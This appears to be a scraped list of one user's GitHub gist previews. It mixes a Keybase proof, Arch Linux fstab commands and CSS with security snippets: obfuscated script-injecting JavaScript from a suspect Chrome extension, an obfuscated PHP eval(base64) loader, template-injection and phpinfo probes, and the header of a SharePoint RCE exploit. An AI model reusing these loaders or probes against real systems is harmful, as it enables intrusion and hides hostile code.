I hereby claim:
- I am 0xcrypto on github.
- I am 0xcrypto (https://keybase.io/0xcrypto) on keybase.
- I have a public key ASCFLpfkpOKtDDLe271f4wv8V-MdNxg139xm1qeXcoXVFAo
To claim this, I am signing this object:
// took out from https://chrome.google.com/webstore/detail/emaze/aiimeahlhgelkbokgffmpdagdaachlpk | |
// do not install. High possibility of being a malware... | |
setTimeout(function() | |
{ | |
(function() | |
{ | |
var _0x47a5x0=document["getElementsByTagName"]("head")[0]; | |
var _0x47a5x1=document["createElement"]("script"); | |
_0x47a5x1["type"]="text/javascript"; |
# First, install arch-install-scripts: | |
sudo pacman -S --needed arch-install-scripts | |
# Secondly, mount your partitions in all the internal hard drives | |
# Thirdly, generate and validate your config by piping it out to stdout: | |
genfstab -U -p / | less | |
# If all looks green, proceed to overwrite your current fstab with the new entries: | |
su -c "genfstab -U -p / >> /etc/fstab" |
// Usage: <li class="locate" address="some address">Some Chapter title</li> | |
"use strict" | |
// global map object. Note that map is not real Map object (google maps api) | |
// this is a wrapper to keep objects organized. | |
var map = { | |
objectMap: {}, | |
infoWindow: {}, |
.roob-search { | |
font-size: 24px; | |
} | |
.masthead { | |
background: black; /* add your color here */ | |
} |
<?php | |
/* | |
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ | |
This code was created on Tuesday, May 30th, 2017 at 22:29 UTC from IP 159.146.47.84 | |
Checksum: ff73395f7b16ebacc0415646d7fe6909dd11f804 | |
*/ | |
$j71b376f="\142\141\x73\x65\x36\x34\137\x64\x65\143\157\144\145";@eval($j71b376f( | |
"Ly9OTitOOFUrVHFKdDFOd0pWSmRpdkdBbXVuUDcwUENXZFVrMUR0VGJQMEZ6L1pMTGgrbGVBK2FyUHRh | |
TzVoZGk5RjRLaFEzZUtkVkNXbWlrQUxQNk9URSt3OWN1SkZGWDlDWFpLNHRDYnhJMTdwY2lOQ0RyTDNlS | |
ElNWG1UVGZFWFBEaGFFM1l3RXhacHl5UmJqYmovdVRZdFJRZzhHZ3ZYeVk5a282THplcnJiVFhic0VTMD |
I hereby claim:
To claim this, I am signing this object:
{{ 7 * 7 }} |
<?php | |
echo phpinfo(); | |
exit() | |
?> |
javascript:alert((function() {links=[];document.querySelectorAll('.yuRUbf').forEach(function (e) {e.childNodes.forEach(function (f) {links.push(f.getAttribute('href'));});});return links;})().join("\n")) |
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution | |
# Google Dork: inurl:quicklinks.aspx | |
# Date: 2020-08-14 | |
# Exploit Author: West Shepherd | |
# Vendor Homepage: https://www.microsoft.com | |
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service | |
# Pack 2, SharePoint Server 2019 | |
# Tested on: Windows 2016 | |
# CVE : CVE-2020-1147 | |
# Credit goes to Steven Seele and Soroush Dalili |